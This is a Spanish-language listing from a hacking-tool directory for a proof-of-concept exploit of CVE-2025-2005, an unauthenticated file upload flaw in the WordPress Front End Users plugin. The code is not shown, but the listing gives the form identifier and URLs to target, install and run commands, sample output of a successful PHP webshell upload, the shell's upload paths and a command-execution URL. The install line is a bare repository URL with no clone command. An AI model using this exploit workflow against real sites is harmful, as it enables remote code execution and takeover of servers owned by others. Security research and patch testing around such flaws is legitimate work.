Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-2005 — Exploit de carga arbitraria de archivos en WordPress FEUP (CVE-2025-2005) | Kitploit
Herramientas/GitHubGitHub/mrmtwoj/cve-2025-2005
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubmrmtwoj/cve-2025-2005

CVE-2025-2005

Exploit de carga arbitraria de archivos en WordPress FEUP (CVE-2025-2005)

Ver Repositorio
31hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

Exploit de Subida Arbitraria de Archivos en WordPress FEUP (CVE-2025-2005)

Este repositorio proporciona un exploit de Prueba de Concepto (PoC) para el plugin Front End Users de WordPress (versiones hasta 3.2.32), el cual es vulnerable a subida arbitraria de archivos debido a la falta de validación de tipo MIME/archivo en su formulario de registro. Esto permite a atacantes no autenticados subir archivos maliciosos (por ejemplo, webshells), lo que potencialmente conduce a Ejecución Remota de Código (RCE) en el servidor.

Características

  • CVE-2025-2005: Vulnerabilidad de subida de archivos en el plugin Front End Users de WordPress
  • Interfaz de línea de comandos simple
  • Descubrimiento automático de formularios de registro
  • Subidor de shell con nombre de usuario/contraseña personalizados

Cómo Funciona

  • Envía una solicitud de registro al formulario de registro vulnerable de FEUP.
  • Sube una shell PHP a través del campo de entrada de archivo, eludiendo las restricciones de tipo de archivo.
  • Muestra el estado de la subida e informa si el sitio es vulnerable.

Objetivos de Prueba

  • Busca formularios de registro que contengan:
  • ewd-feup-register-form
  • En URLs como:
root@kitploit:~
/register/
/signup/
  • o cualquier enlace encontrado en la página de inicio

Primeros Pasos

  • Python 3.x
  • Módulos requests y beautifulsoup4:
root@kitploit:~
pip install requests beautifulsoup4

Instalación

root@kitploit:~
https://github.com/mrmtwoj/CVE-2025-2005.git
cd CVE-2025-2005

Uso

root@kitploit:~
python3 exploit.py --url http://target.com --user hacker --password pass123

Salida de Ejemplo

root@kitploit:~
[*] Scanning site: http://victim.com
[*] Found 17 pages.
[+] Registration form found at: http://victim.com/register
[*] Uploading shell...
[+] Shell uploaded successfully!

Ejecutar Exploit

root@kitploit:~
Location ::
http://victim.com/wp-content/uploads/shell.php
http://victim.com/wp-content/uploads/ewd-feup-user-uploads/shell.php
RUN ::
http://victim.com/wp-content/uploads/shell.php?cmd=whoami
Descargar herramienta